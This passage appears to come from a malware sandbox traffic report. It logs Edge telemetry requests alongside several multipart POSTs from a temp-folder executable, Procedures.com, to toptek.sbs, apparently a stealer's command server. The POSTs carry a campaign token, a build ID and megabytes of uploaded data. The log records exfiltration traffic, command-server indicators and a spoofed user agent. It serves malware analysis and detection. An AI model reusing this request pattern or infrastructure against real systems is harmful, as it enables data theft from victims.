33 | 192.168.2.5 | 50002 | 108.139.47.92 | 443 | 6772 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:38 UTC | 1012 | OUT | GET /b2?rn=1734931474877&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2DB99B69D85C6DF817C28E37D9F46CAD&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: UID=19Abb18dd40861f844b83d11734931476; XID=19Abb18dd40861f844b83d11734931476
2024-12-23 05:24:38 UTC | 326 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:38 GMT
                                                                                                                                                                                                                                                                                                  Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                  Via: 1.1 5b4b6c6517b988a4ff2c794e5583ee02.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                  X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                                  X-Amz-Cf-Id: du_ixGEvsRoarwYPXhDjrk2KlMmRgLr6poA921Czpx9P8FF3z0a4tA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 50004 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:38 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----J5PP8Q9ZUA1NYMY5FCTR
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 131557
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-23 05:24:38 UTC | 16355 | OUT | Data Ascii: ------J5PP8Q9ZUA1NYMY5FCTRContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------J5PP8Q9ZUA1NYMY5FCTRContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------J5PP8Q9ZUA1NYMY5FCTRCont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:38 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:38 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:24:40 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:40 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
2024-12-23 05:24:40 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 50009 | 20.110.205.119 | 443 | 6772 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:38 UTC | 1261 | OUT | GET /c.gif?rnd=1734931474876&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=7f980c21c7474272aa4243416d38e40b&activityId=7f980c21c7474272aa4243416d38e40b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=0DA4B0A2ABA24210907773DA18D43FAE&MUID=2DB99B69D85C6DF817C28E37D9F46CAD HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: c.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=2DB99B69D85C6DF817C28E37D9F46CAD; _EDGE_S=F=1&SID=0A0B2915223862D112663C4B235E6391; _EDGE_V=1; SM=T
2024-12-23 05:24:39 UTC | 982 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                  ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                  P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                                  Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                  Set-Cookie: MUID=2DB99B69D85C6DF817C28E37D9F46CAD; domain=.msn.com; expires=Sat, 17-Jan-2026 05:24:39 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                  Set-Cookie: SRM_M=2DB99B69D85C6DF817C28E37D9F46CAD; domain=c.msn.com; expires=Sat, 17-Jan-2026 05:24:39 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                  Set-Cookie: MR=0; domain=c.msn.com; expires=Mon, 30-Dec-2024 05:24:39 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                  Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Mon, 23-Dec-2024 05:34:39 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:38 GMT
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Content-Length: 42
2024-12-23 05:24:39 UTC | 42 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                                  Data Ascii: GIF89a!,L;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 50015 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:39 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----G47GDB16FUSRIMOPZCBI
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 6990993
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-23 05:24:39 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 47 34 37 47 44 42 31 36 46 55 53 52 49 4d 4f 50 5a 43 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 34 37 47 44 42 31 36 46 55 53 52 49 4d 4f 50 5a 43 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 47 34 37 47 44 42 31 36 46 55 53 52 49 4d 4f 50 5a 43 42 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------G47GDB16FUSRIMOPZCBIContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------G47GDB16FUSRIMOPZCBIContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------G47GDB16FUSRIMOPZCBICont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:24:47 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:46 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 50027 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:41 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----Y5XTR9HDBSJMYUAA1D2D
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
